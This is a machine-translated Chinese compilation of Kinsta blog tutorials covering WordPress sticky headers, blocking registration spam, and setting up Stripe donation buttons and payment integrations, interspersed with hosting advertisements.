例如,Twenty Twenty Two 2 主题使用两个 header 标记,很难找到合适的 CSS 混合来使您的代码在正确的元素上工作。这与块编辑器中的模板类对话框是一样的(如果你使用 FSE 功能):
The Brave Inspector showing multiple header tags for the Twenty Twenty-Two theme.
无论如何,您需要的代码都是一样的:
Akhil Arjun 为此提供了双线解决方案:
header {
position: sticky; top: 0;
}
然而,您可能还想考虑使用位置:固定的属性,它使用了多几行代码:
header {
position: fixed;
z-index: 99;
right: 0;
left: 0;
}
这使用了 z-index 将标题放在堆栈的前面,然后使用一个固定的属性使它停留在屏幕的顶部。
请注意,您可能需要在这里添加一个新的类,以便应用粘性头。不管怎样,这应该实现了你的粘性头的框架。一旦你确定了这一点,你会想在设计上做进一步的工作,使它与你的网站的其余部分一起工作。
让你的粘性标题更有效的小贴士
一旦你有了一个创建粘性标题的方法,你会想知道如何完善它。有很多方法可以改进基本设计,并确保它满足网站访问者的需求。
对于你自己的粘性头球,一个很好的类比是确保它像一个好的体育裁判。很多时候,你不会知道他们在那里。然而,当一名球员或教练需要他们时,他们会打电话并到场。
你的粘性标题也应该这样做——躲在暗处,或者在用户需要之前不要放在心上。你可以用一些经验法则来实现这一点,如果设计需要,你可以选择打破这些法则:
- 保持紧凑。屏幕空间将会很珍贵,所以尽量保持小标题。你可以实现一个解决方案,让你的标题以一种动态的方式伸缩,基于它所在的站点区域。
- 在小屏幕上使用隐藏的标题和菜单。通过扩展,你可以选择隐藏一个菜单,就像前面的 Hammerhead 例子一样。这有助于保持标题紧凑,并与下一个要点相联系。
- 确保你不会让别人分心。屏幕上的元素数量越多,它们争夺的注意力就越多。如果粘性标题不需要显示某个元素,就删除它——你的正文内容会欣赏它,你的指标也会欣赏它。
- 提供对比。这是行动号召(CTA)行动手册中的一个技巧。如果你将对比作为一个整体应用于粘性标题,以及它的单个元素,你可以将注意力吸引到你需要的地方——或者把它推到别的地方。
总的来说,你的粘性头只会做你需要它做的事情,仅此而已。有时你需要保持事情最少,其他时候你需要用链接、徽标和注册表格来包装它。不管怎样,如果你记住了 UX 和用户界面,你就会做出以用户为中心的决定。
借助粘性标题,让你的导航元素在网站访问者的视线范围内,不管它们在页面的什么位置。✨ 点击推文
摘要
网站的可用性和 UX 是如此重要,以至于当你设计和构建网站时,它们应该是你首先、其次和第三要考虑的事情。你的网站导航只是其中的一个方面,但是你需要找出让用户在你的网站上自由移动的最佳方式。粘性标题是实现它的一个好方法。
如果你把标题固定在屏幕的顶部,用户就可以随时看到导航元素。这在需要滚动来移动正文内容的设备上尤其有用,但无论外形如何都有好处。如果你是一个 WordPress 用户,你可以选择一个插件或者代码来实现粘性标题。然而,您可能会在您最喜欢的主题中发现该功能,在这种情况下,您可以使用它,并对灵活性造成影响。
你认为粘性标题是一个网站的 UX 和用户界面的基本元素吗?如果不是,什么是?请在下面的评论区告诉我们!
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
如何阻止注册垃圾邮件(插件和策略)
原文:https://kinsta.com/blog/stop-wordpress-registration-spam/
试图阻止你网站上的注册垃圾邮件?
因为 WordPress 的巨大人气,它成为了全世界垃圾邮件发送者的诱人目标。他们可能只是试图利用您的网站并获得访问权限。或者,他们可能想给你的社区发垃圾邮件,比如用垃圾主题填充你的论坛。
如果你允许在你的 WordPress 网站上公开注册,你几乎肯定会遇到某种形式的垃圾注册问题。
在这篇文章中,你将学习如何使用内置的 WordPress 功能和免费插件来减少垃圾注册。
更喜欢看视频版?
默认的 WordPress 注册过程
在我们进入战术之前,让我们简单讨论一下默认的 WordPress 注册过程。
如果你允许在你的站点公开注册,默认的注册页面位于https://yoursite.com/wp-login.php?action=register:
The default WordPress registration form
正如你所看到的,没有多少阻止恶意行为者或机器人创建垃圾邮件注册。
机器人可以直接进入你的注册页面,在每个域中添加相同的公式,没有什么可以阻止他们填写表单域。
如何阻止注册垃圾邮件
有许多不同的策略可以用来阻止注册垃圾邮件。根据您站点的需求和问题的严重性,您可能只需要实施这些策略中的一种,或者您可能需要尝试多种策略来阻止垃圾邮件。
以下是完整的策略列表:
完全禁用 WordPress 注册
首先,如果你不需要在你的 WordPress 网站上公开注册,最好干脆禁用注册,而不是试图打击垃圾注册。
即使你需要在你的网站上给其他人用户账号,那也不一定意味着你需要启用公共注册。例如,如果你只需要一小部分人拥有自己的账户,你可以手动为他们创建账户,而不是让他们自己注册。
要完全禁用 WordPress 上的用户注册,进入设置→常规并确保任何人都可以注册框中的未被选中:
How to disable WordPress registration
一旦您禁用注册,任何试图访问您的默认注册页面的人都会看到以下消息:
一例残疾人登记
将验证码添加到您的注册表中
另一种防止用户注册垃圾的方法是在默认的 WordPress 注册表单中添加验证码。
有各种类型的验证码可以使用,但大多数人认为谷歌的 reCAPTCHA 服务是最用户友好的(也称为无验证码 reCAPTCHA)。它的目标是对大多数合法的人类访问者不可见,同时仍然向它确定可能是机器人的访问者显示验证码测试。
要将 NoCAPTCHA reCAPTCHA 添加到你的 WordPress 注册表单中,你可以使用免费的高级 noCaptcha &隐形验证码(v2 & v3) 插件。
要设置插件,你首先需要从谷歌生成一个免费的 reCAPTCHA API 密匙——只需要进入你的网站并选择使用哪种类型的 reCAPTCHA:
Generating reCAPTCHA API key
然后,你可以进入设置→高级 noCaptcha &隐形验证码设置插件:
- 选择版本(确保这与您在创建 API 密钥时选择的相匹配)。
- 添加您的站点密钥和秘密密钥(在您提交之前截图的表单后,Google 会给您这些密钥)。
- 选择在哪里启用您的验证码。除了注册表单之外,您还可以在站点的其他部分启用它,比如您的登录表单。
How to set up WordPress reCAPTCHA
保存更改后,您应该会在注册页面上看到您的验证码表单(除非您选择了一种不可见的方法,在这种情况下,它只会对可疑的机器人可见):
An example of reCAPTCHA on the default registration form
使用专门的注册垃圾邮件插件
一些通用的 WordPress 反垃圾邮件插件可以帮助阻止 WordPress 注册垃圾邮件,以及其他领域的垃圾邮件,比如你的评论区或表单提交。
不幸的是,Automattic 的流行的 Akismet 评论垃圾插件对注册垃圾邮件不起作用,但其他一些流行的阻止注册垃圾邮件的选项包括:
同样,这些插件不仅限于注册垃圾邮件,但他们确实可以帮助您阻止垃圾邮件注册,作为其反垃圾邮件工作的一部分。
新用户需要管理员批准
如果除了垃圾邮件账户本身,你还担心注册了后的人们会做什么,另一个好的策略是要求新用户的管理员批准。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
例如,如果你担心有人向你的 bbPress 论坛或 BuddyPress 社区发送垃圾邮件,要求管理员批准可以让你避免这种情况。
这是一个与验证码或其他策略结合的好方法:验证码将过滤掉低级别的自动垃圾邮件,而您可以使用手动批准来捕捉其他所有内容。
然而,如果您有大量的垃圾邮件注册,并试图自己实施这一策略,您可能会发现自己在试图对所有注册进行排序时不知所措。
新用户需要管理员批准,你可以使用免费的 WP 批准用户插件。
一旦你安装并激活了插件,它马上就开始工作了。您现有的所有用户都将被批准(以避免问题)。
然而,新用户将需要手动批准,你可以在你的 WordPress 仪表盘的现有的用户区域完成:
Approving users with WP Approve User plugin
您还可以选择在用户处于以下情况时发送和自定义电子邮件:
- 被认可的
- 未经同意的
您可以通过访问设置→批准用户来启用这些电子邮件并自定义其内容。
阻止恶意 IP 地址
如果你的大量注册垃圾邮件来自同一个 IP 地址,你可以通过首先阻止这些 IP 地址访问你的网站来解决这个问题。
如果你的主机在 Kinsta,我们会在 Kinsta 仪表板中为提供一个 IP 拒绝工具。要访问它,请打开您遇到问题的站点,并选择站点仪表板侧边栏中的 IP 拒绝选项:
How to block IP addresses with MyKinsta
大多数 cPanel 主机应该也会给你一个 IP 拦截工具。
更改 WordPress 注册 URL
如果你想给你的注册页面增加一些“安全性”并减少低级别的机器人流量,你可以改变你的注册页面的 URL 而不是所有 WordPress 网站使用的默认 URL。
厌倦了 WordPress 的问题和缓慢的主机?我们提供世界一流的支持,由 WordPress 专家提供 24/7 服务和超快的服务器。查看我们的计划
注册页面实际上是 WordPress 登录页面的一部分,所以你可以用任何允许你改变 WordPress 登录 URL 的插件来完成。
一个好的选择是免费的 WPS 隐藏登录插件。
一旦你安装了插件,进入设置→ WPS 隐藏登录进入你的新网址。您还可以将默认 URL 重定向到另一个页面,如您的 404 页面:
How to change WordPress registration URL
例如,如果您将您的登录 URL 更改为yoursite.com/sneakylogin,那么默认注册页面将不再起作用。你的新注册页面将会是 yoursite.com/sneakylogin/?action=register 的。
**### 使用自定义 WordPress 注册表单插件
另一个阻止 WordPress 注册垃圾邮件的好方法是使用一个定制的 WordPress 注册表单插件。
这些插件可以让你绕过正常的 WordPress 注册过程,还可以实现一些有用的反垃圾邮件策略,比如:
- 自定义注册网址–改变你的默认注册网址可以减少一些低级垃圾邮件,尽管它本身不太可能阻止用户注册垃圾邮件。
- 电子邮件确认–这通过要求新用户确认其电子邮件来防止垃圾邮件用户发送虚假电子邮件。如果用户没有确认他们的电子邮件,插件将自动放弃注册。
- 新用户的管理批准–这些插件通常可以帮助你实现上面的管理批准功能。
- 垃圾邮件防御–这些插件还可以帮助您将验证码或蜜罐字段添加到您的自定义注册表中。
许多通用的 WordPress 表单插件也包括创建带有反垃圾邮件功能的自定义注册表单的能力。然而,这里的缺点是,您通常只能在高级版本中获得注册功能。如果你愿意付钱,一些好的选择是:
让我们仔细看看如何使用用户注册和配置文件生成器插件提供的两个免费解决方案。
1.用户注册
当你安装免费用户注册插件时,它会给你一个选项,让你自动创建位于【yoursite.com/registration】T2 的自定义注册页面(你可以随时更改这个 URL)。
在注册过程中,您还有其他一些减少垃圾邮件的方法。
首先,在插件设置的通用选项选项卡中,您可以使用用户登录选项下拉菜单在用户注册后要求管理员批准:
Enabling admin approval in User Registration plugin
你也可以去 Integration 标签来设置 Google reCaptcha ( 你将需要你的 API 密匙——你可以遵循本文前面的相同步骤):
Enabling reCAPTCHA in User Registration plugin
要在特定的注册表单上启用 CAPTCHA,您还需要编辑该表单并在那里启用它。编辑表单时,如果需要,还可以添加其他配置文件信息字段。
2.配置文件生成器
免费的 Profile Builder 插件遵循相同的基本方法。
要定制您的注册表单字段,您可以转到个人资料生成器→表单字段。要将验证码添加到您的表单中,您可以包含一个 reCAPTCHA 字段,您需要在其中添加 API 密钥:
Adding a CAPTCHA field in Profile Builder plugin
然后,为了显示您的定制注册表单,您可以在站点的任何地方添加【wppb-register】简称。
Profile Builder 还包括一个新注册需要管理员批准的功能,但它只在高级版本中可用。
摘要
如果你需要允许在你的 WordPress 站点上公开注册,注册垃圾邮件会是一个令人沮丧的问题。你可以结合不同的策略来减少甚至完全消除注册垃圾邮件。
最简单、最轻量级的选择是在默认的 WordPress 注册表单中添加一个 NoCAPTCHA reCAPTCHA。大多数人类访客不会注意到任何不同,但谷歌会向机器人显示验证码测试,以防止他们垃圾注册。
如果你想要一个全面的检查,你也可以使用一个专用的 WordPress 注册插件来创建一个定制的注册表单,包括它自己的反垃圾邮件属性,以及像新用户的管理员批准这样的功能。
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。**
如何在 WordPress 中添加一个条纹捐赠按钮(2 个免费选项)
想在你的 WordPress 站点上添加一个条纹捐赠按钮吗? Stripe 使接受信用卡支付变得容易,这是你的访问者向你的网站捐款的一种便捷方式。
虽然还有很多功能更全的捐赠插件,但在这篇文章中,我们将重点创建一个非常简单的条纹捐赠按钮。
为此,我们将分享两个不同免费插件的教程:
- WP 简单支付:如果你想提供固定捐赠金额,这个插件不错。但是如果你想让你的访问者能够捐赠定制的数量,你需要付费。这是最流行的条纹支付插件。
- Stripe Payments :这个插件可以让你免费接受自定义捐赠金额,如果你预算有限,想要接受访客的自定义捐赠金额,这可能会更有吸引力。
我们将从如何创建你的 Stripe 账户的快速教程开始,并找到配置任一插件所需的 API 密钥。
然后,我们将深入探讨如何创建一个带 WP 简单支付或条纹支付条纹捐赠按钮。
如何获得你的 Stripe API 密钥?
无论你选择两个插件中的哪一个,你都需要输入你的 Stripe API 键来创建你的 Stripe 捐赠按钮。
需要在这里大声喊出来。Kinsta 太神奇了,我用它做我的个人网站。支持是迅速和杰出的,他们的服务器是 WordPress 最快的。
这些 API 键将你的 WordPress 站点连接到 Stripe 支付处理服务。它们是必不可少的,但也很容易用条纹打造。所以不用担心!
我们现在只解释一次,而不是试图一步一步地解释每个插件。这样,当您配置任一插件时,您将确切地知道在哪里可以找到您的 API 键。
1.创建一个免费的条纹帐户
若要开始,您需要注册一个免费的 Stripe 帐户。没有复杂的信息——你只需要输入你的电子邮件、姓名和密码(尽管你需要提供更多的信息来开始真正接受付款)。
为此,前往此处。
2.查找 API 密钥
要查找您的 API 密钥,请点击这里。
请注意测试 API 密钥和实时 API 密钥之间的区别:
- 测试 API 密匙 帮助你安全地测试你的捐赠按钮,无需发送任何真实的支付细节。
- Live API 密匙是当你真正想要开始接受支付时使用的。
您可以通过单击切换按钮在它们之间切换,这两个插件都将包含允许您输入测试和实时键的框,以及允许您在测试和实时模式之间切换的设置:
Your Stripe API keys
把这些键放在手边,因为你需要它们来配置任何一个插件。
如何用 WP 简单支付添加条纹捐赠按钮?
首先,安装并激活 WordPress.org 的免费 WP 简单支付插件。
然后,这里是如何设置你的捐赠按钮…
1.输入 API 密钥
要开始,进入简单支付建兴→设置并输入您的测试和现场 API 密钥。确保测试模式暂时保持启用:
Enter API keys and make sure Test Mode is enabled
2.配置货币(默认为美元)
默认情况下,WP 简单支付使用美元作为捐款按钮的货币。如果您想使用不同的货币,您可以通过进入常规设置选项卡进行更改:
How to change the currency
3.创建新的付款表单
一个支付 表单本质上是一个你想要使用的特定捐赠按钮。要创建一个,请转到简单支付精简版→添加新的。
在支付选项选项卡中,输入您希望访客能够捐赠的金额(如果您希望访客能够捐赠自己定制的金额,您将 需要付费版本的 插件):
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
Enter the fixed donation amount
从技术上来说,这就是你需要做的一切。但是为了提供更加个性化的表单,您可以在页面表单显示和结帐覆盖显示选项卡中更改表单上显示的文本。
例如,在页面表单显示区域,您可以更改文本,使按钮显示“用卡捐赠”而不是“用卡支付”:
Change donate button text
完成后,单击创建发布您的表单。
要在站点的前端显示表单,您需要将短代码添加到您希望它显示的帖子、页面或文本小部件中:
The WP Simple Pay shortcode
4.测试您的表单,然后启用实时模式
因为您启用了测试模式,所以您可以通过输入一些测试数据来测试表单:
Example of the donate button
一旦你对一切正常运行感到满意,你可以通过进入简单支付精简版→设置和禁用 测试模式来启用实时模式,开始接受实际支付:
How to disable test mode
如果你想编辑用户提交付款后看到的页面,你只需要编辑 WP Simple Pay 创建的付款确认页面。
如何用条纹支付添加条纹捐赠按钮?
虽然Stripe pays不像 WP Simple Pay 那么受欢迎,但它的优势是你可以接受定制的捐赠金额,而无需为高级版本付费。
Struggling with downtime and WordPress problems? Kinsta is the hosting solution designed to save you time! Check out our features
一旦你从 WordPress.org 安装并激活了它,以下是如何使用它…
1.添加 API 密钥并配置基本设置
要开始,请进入条纹支付→设置添加您的 API 密钥:
How to enter your API keys
确保实时模式是而不是现在选中的。
您还可以在此区域为您的捐赠按钮配置货币,以及按钮文本。您可能希望将按钮文本字段更改为类似“捐赠”的内容:
Configure currency and button text
2.添加新产品
接下来,进入条纹支付→添加新产品。选项很多,但是对于一个基本的捐款按钮来说,大部分都是不必要的。
您应该配置的部分包括:
- 简短描述–显示在条纹支付窗口上。
- 价格&货币–如果您希望访问者能够输入自定义金额,请将价格留空。
- 感谢页面 URL–这可以让你在用户捐款后将他们重定向到一个特殊的感谢页面。
Choose fixed or custom donation amount
完成配置后,点击发布。然后,从编辑器底部复制短代码,并将其添加到您想要显示条纹捐赠按钮的帖子、页面或文本小部件中。
3.测试捐赠按钮,然后上线
因为您仍处于测试模式,所以您可以通过输入 Stripe 的虚拟数据来安全地测试您的捐赠按钮:
Example of the custom donation amount form
一旦您确认一切正常,您就可以通过进入条纹支付→设置并打开实时模式来启用真正的支付:
How to disable test mode
摘要
无论你选择哪个插件,在你的 WordPress 站点上添加一个条纹捐赠按钮都是相当简单和没有痛苦的。这两个插件还允许你创建多个按钮,所以你可以很容易地为不同的用途创建不同的捐赠按钮。
如果你在创建自己的按钮后对 Stripe 不满意,你还可以考虑通过 PayPal 或比特币接受捐赠。在本指南中,我们收集了使用 Stripe 或 PayPal 的所有利弊。
关于在你的 WordPress 网站上添加一个捐赠按钮,你还有其他问题吗?或者需要我们没有提到的不同功能?请留下您的评论,我们会尽力帮助您!
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
为 WordPress 设置 Stripe 的 4 种简单方法
当谈到选择在你的 WordPress 网站上使用的支付网关时,通常会想到两个流行的网关,PayPal 和 Stripe。几年前,PayPal 曾是电子商务网站唯一简单的解决方案之一,但现在情况不同了。Stripe 提供了较低的交易费用,并因其灵活的 API 而在开发人员社区中非常受欢迎。今天我们将深入探讨 4 种简单的方法来为 WordPress 设置 Stripe,不需要编码。对于初创公司、企业以及运营 WooCommerce 和 EDD 商店的人来说,Stripe 是一个非常实惠的解决方案。
用方形代替?查看我们的深度对比博文:条纹 vs 方形。
什么是条纹?
Stripe 是一个快速发展的支付网关,能够处理经常性支付,并能自动处理退款。它受到世界各地大牌品牌的信任和使用,其中包括百思买、塔吉特、Lyft、Docker、HubSpot、脸书、 Shopify 和 IndieGoGo。实际上,我们在 Kinsta 使用它们来接受所有虚拟主机客户的付款。
Stripe 由约翰和帕特里克·科利森两兄弟于 2010 年创立。它于 2011 年公开推出,并获得了多轮融资。它甚至在 2016 年福布斯云 100 强榜单上排名第四。有很多支付网关可供选择,但 Stripe 对简单性的关注以及他们受欢迎的 Stripe API 使他们从竞争对手中脱颖而出,这帮助 Stripe 收入获得巨大增长,在市场份额方面排名第二,仅次于 Paypal。他们的收费结构更容易理解,因为对于那些年收入低于 100 万美元的人来说,这是一个 2.9% + 30 的统一费率。他们还允许你从自己的网站上免费向信用卡收费,而贝宝每月收取 30 美元,外加交易费。Stripe 也不收取任何退款或授权卡的费用。然而,随着交易量的增加,贝宝的确会变得更便宜。
Stripe 还有一款名为 Radar 的机器学习产品,可以减少欺诈交易的数量。如需了解更多详情,请查看我们的详细指南:如何使用条纹雷达防止信用卡欺诈并将其减少 98%
为 WordPress 设置条纹
Stripe 在技术上没有官方的 WordPress 插件或集成,但是感谢那些使用他们的 API 的令人敬畏的 WordPress 社区,现在有很多很好的选择来轻松地在你的站点上获得 Stripe。下面我们将介绍 WordPress 在一个基本网站上的设置,包括一个表单插件和自定义字段,以及像 WooCommerce 和 Easy Digital Downloads 这样的电子商务平台。需要注意的是 SSL 需要在您的 Stripe checkout 页面上安全地传输支付数据。许多主机,甚至是 Kinsta,现在都提供免费 SSL 证书和“让我们加密”。不过要小心,如果你没有正确迁移,你可能会损害你的网站,所以一定要查看我们深入的 HTTP 到 HTTPS 迁移指南。
所有这些教程都假设您有一个 Stripe 帐户。如果没有,你可以注册一个免费的 Stripe 账户。
如何在基本的 WordPress 站点上设置 Stripe
为 WordPress 设置 Stripe 的第一种方法是在一个基础站点上。也许你没有任何电子商务解决方案设置,只是有一个你想在一个页面上销售的产品。这可能是一个很好的方式来接受电子书或数字下载的付款(甚至捐款),而不会给你的网站带来任何额外的开销。为此,我们推荐免费的 WP 简单付费 Lite for Stripe 插件,你只需简单的 4 个步骤就能上手。他们也有一个专业版的插件,可以实现定期支付和许多其他功能,但如果你需要简单快捷的东西,你可以用免费版。它目前有超过 10,000 个活跃安装,五星评级为 4.6。
WP Simple Pay Lite for Stripe WordPress plugin
第一步
从 WordPress 知识库下载并安装 WP Simple Pay Lite for Stripe 插件,或者在你的 WordPress 仪表盘的“添加新插件下搜索。
Install WP Simple Pay Lite plugin
第二步
你需要做的第一件事是点击进入插件的设置,并输入你的 Stripe API 密钥,你可以从你的 Stripe 帐户仪表板中获取。然后点击“保存更改”你会注意到有一个开关。在完成所有配置之前,您可以保持关闭状态。
WP Simple Pay Lite API keys
第三步
点击进入“默认”设置选项卡。在那里你可以给你的网站命名,设置货币,提供图片等等。一个重要的设置是成功重定向 URL。如果你正在跟踪一个感谢页面的转换,那么你需要启用它。参见我们深入的转换跟踪指南。然后向下滚动并点击“保存更改”
WP Simple Play Stripe settings
第四步
然后你可以用一个简单的短代码在你的 WordPress 站点的任何页面或帖子上插入一个支付按钮。请记住,您可以在插件设置中更改支付按钮的措辞。下面是一个可以粘贴到页面或帖子中的短代码示例:
[stripe name="My Store" description="My Product" amount="1999"]
WP Simple Pay checkout
查看所有 WP 简单支付短码。就是这样!向你的 WordPress 站点添加 Stripe 再简单不过了。如果您还没有设置,请确保将实时模式切换到“开”。你也可以利用他们免费的配套插件在你的 WordPress edito r 中增加一个按钮来更容易地添加支付按钮。不需要抓取任何短码。
Stripe shortcode button
如何用重力形式设置条纹
使用 Stripe for WordPress 的第二个常见配置是将它与表单插件一起使用。你可能想这样做的原因是,它给你更多的灵活性,能够在结帐过程中添加你自己的定制字段。许多流行的形态插件有简单的条纹集成和扩展,比如重力形态、忍者形态和 WP 形态。条带集成通常是一种额外的附加功能。在我们的例子中,我们将使用重力形式插件。
步骤 1
下载并安装 Gravity Forms 插件及其 Stripe 扩展插件。这确实需要开发者许可。
第二步
你需要做的第一件事是点击进入插件的设置,并输入你的 Stripe API 密钥,你可以从你的 Stripe 帐户仪表板中获取。然后点击“保存更改”你会注意到有一个现场和测试模式。您可以将它保持在测试模式,直到您正确地配置了所有的东西。
Gravity Forms Stripe settings
第三步
向下滚动,您将需要配置 Webhooks。Gravity Forms 要求将一个 URL 添加到您的 Stripe 帐户的 webhooks 列表中,以便一切正常运行。
- 点击以下链接并登录进入您的 Stripe Webhooks 管理页面:
https://dashboard.stripe.com/account/webhooks - 单击 Webhook URLs 列表上方的“添加端点”按钮。
- 在“URL”字段中输入以下 URL:
https://yourdomain.com/?callback=gravityformsstripe - 从“模式”下拉菜单中选择“实时”。
- 单击“创建端点”按钮。
Stripe webhook for Gravity Forms
然后选中表示您已启用 webhook URL 的复选框,并单击“更新设置”
Update Stripe webhooks
第四步
现在是时候设置您的表单了。如果您还没有表单,您需要创建一个新的表单。
Create a new form in Gravity Forms
第五步
在表单中,您可以对其进行配置,以接受您想要的任何数据。您甚至可以为消息设置一个必填字段。正如你所看到的,这比我们上面介绍的简单付费插件提供了更多的定制。只要确保你有信用卡字段和价格。一切都是重力形式的拖放,所以创建它是快速和容易的。
Billing Form
第六步
在你创建你的表单后,你需要用一个 feed 把它连接到 Stripe。点击表格本身的设置,进入“条纹”您可以设置交易类型和支付金额。然后点按“更新设置”
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
Billing form feed
第七步
然后,您可以将表单插入到页面或帖子中。在 WordPress 编辑器 Gravity Forms 中有一个叫做“添加表单”的按钮选择您创建的表单,然后单击“插入表单”
Insert form
仅此而已。您的表单现在是一个功能齐全的表单,与 Stripe 集成,能够捕获付款。
Credit Cards in Gravity Forms
如何在 WooCommerce 中设置条纹
使用 Stripe for WordPress 的第三种常见配置是与 WooCommerce 一起使用。WooCommerce 是 WordPress 最受欢迎的免费电子商务解决方案之一,拥有超过 300 万的活跃安装量,在 WordPress.org 获得 4.6 的用户评分。截至 2019 年 12 月, WooCommerce 为超过 7%的在线商店提供服务。
好消息是,自 2016 年 2 月起, Stripe 可免费与 WooCommerce 一起使用!以前,你必须直接从 WooCommerce 购买 Stripe 支付网关,单个网站许可证的起价为 79 美元。这大大降低了任何想开网上商店并接受 Stripe 信用卡的人的门槛。下面的教程假设你已经安装并运行了 WooCommerce。如果你不知道,可以看看我们的深度 WooCommerce 教程。
第一步
你需要做的第一件事是安装免费的 WooCommerce Stripe 支付网关插件。它目前有超过 300,000 个活跃安装,五星评级为 4.7。
WooCommerce Stripe Payment Gateway plugin
你可以从 WordPress 知识库下载插件,或者在你的 WordPress 仪表盘的“添加新插件”下搜索插件。
第二步
然后点击仪表盘中的 WooCommerce 设置,点击“结帐”标签。您需要启用 Stripe 并输入您的 Stripe API 密钥,您可以从您的 Stripe 帐户控制面板中获取这些密钥。您还可以选择是否启用“条带检出”Stripe checkout 在结帐时显示支付按钮和模态信用卡表单,而不是传统的信用卡字段。然后向下滚动并点击“保存更改”
WooCommerce Stripe settings
第三步
然后在“结帐”标签下点击进入“结帐选项”您需要启用“强制安全结帐”记住 Stripe 要求 SSL 在你的 WordPress 站点上安全地接受信用卡。然后向下滚动并点击“保存更改”
Struggling with downtime and WordPress problems? Kinsta is the hosting solution designed to save you time! Check out our features
WooCommerce force secure checkout
仅此而已。您的结账页面现在应该可以接受带条纹的信用卡了。这里有几个例子。
默认 WooCommerce 条纹结账
这是一个 WooCommerce checkout 页面上的默认条纹外观,页面上有内嵌的信用卡字段。
Credit Card checkout in WooCommerce
启用条纹结账选项的 WooCommerce】
如果您在设置中启用了“条纹检出”选项,这就是外观。顾客点击“继续付款”,他们会得到条纹模型。
Stripe checkout in WooCommerce
如何在简易数字下载中设置条纹
使用 Stripe for WordPress 的第四个常见配置是与 Easy Digital Downloads 一起使用。就像 WooCommerce 一样, Easy Digital Downloads 是 WordPress 的一个流行的免费电子商务解决方案。它主要用于销售数字产品,但是也有一个扩展来适应实体产品。现在它真的变成了 WooCommerce 的替代品。它目前有超过 50,000 个活跃安装,五星评级中有 4.8 个。下面的教程假设你已经安装并运行了 EDD。如果你不知道,请查看简易数字下载文档。
容易数字下载条纹集成的一个缺点是,它确实需要高级扩展,单个站点许可证的起价为 89 美元。然而,如果你喜欢 EDD,想用条纹,这可能是值得的。
第一步
下载、安装并激活条形支付网关扩展。
第二步
在下载(这是 EDD),点击进入设置,然后进入支付网关 gab。在网关设置中,您需要选中条带以启用它。然后将默认网关更改为 Stripe。然后,您还可以选择在结账时显示信用卡图标。然后点击“保存更改”
EDD Stripe payment gateway settings
第三步
在支付网关选项卡下,单击“Stripe”您将需要输入您的 Stripe API 密钥,您可以从您的 Stripe 帐户仪表板中获取这些密钥。您还需要配置 Webhooks。
- 点击以下链接并登录进入您的 Stripe Webhooks 管理页面:
https://dashboard.stripe.com/account/webhooks - 单击 Webhook URLs 列表上方的“添加端点”按钮。
- 在“URL”字段中输入以下 URL:https://yourdomain.com/index.php?edd-listener=stripe
- 从“模式”下拉菜单中选择“实时”。
- 单击“创建端点”按钮。
您可以设置一些附加选项。您可以选择是否启用“条带检出”Stripe checkout 在结帐时显示支付按钮和模态信用卡表单,而不是传统的信用卡字段。然后向下滚动并点击“保存更改”
Stripe settings in EDD
仅此而已。您的结账页面现在应该可以接受带条纹的信用卡了。这里有几个例子。
默认 EDD 条纹结账
这是 EDD 结帐页面上条纹的默认外观,信用卡字段内嵌在页面上。
Stripe credit card checkout in EDD
启用条带检验选项,轻松下载数字内容
如果您在设置中启用了“条纹检出”选项,这就是外观。顾客点击“继续付款”,他们会得到条纹模型。
Stripe checkout in EDD
摘要
正如你所看到的,为 WordPress 设置并运行 Stripe 是相当简单的。事实上,以上所有四个集成只需要几分钟。这比几年前容易多了。它也变得越来越便宜,因为许多解决方案现在是免费的。别忘了,你还可以使用 Stripe 接受捐赠。
你的经历是什么?你在你的 WordPress 网站上使用 Stripe 吗?
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
Stripe 与 Braintree:为您的企业选择合适的支付解决方案
选择支付处理器和网关是一项重大的商业决策。选择一个可靠的解决方案至关重要,这样你就不会在以后遇到问题。Stripe 和 Braintree 是最受欢迎的两个数字支付平台!
凭借透明的费用、令人印象深刻的反欺诈技术和全球覆盖,这是初创公司和成熟企业的两个最佳选择。
但是当 Stripe 和 Braintree 对决时,哪一个会胜出呢?
这就是我们将在本帖中发现的。
激动吗?让我们开始吧!
Stripe 和 Braintree 是做什么的?
Stripe 和 Braintree 都提供在线工具帮助企业接收和处理支付。
这两家公司都是全栈支付平台,提供从支付处理和支付网关到商家账户的一切服务。
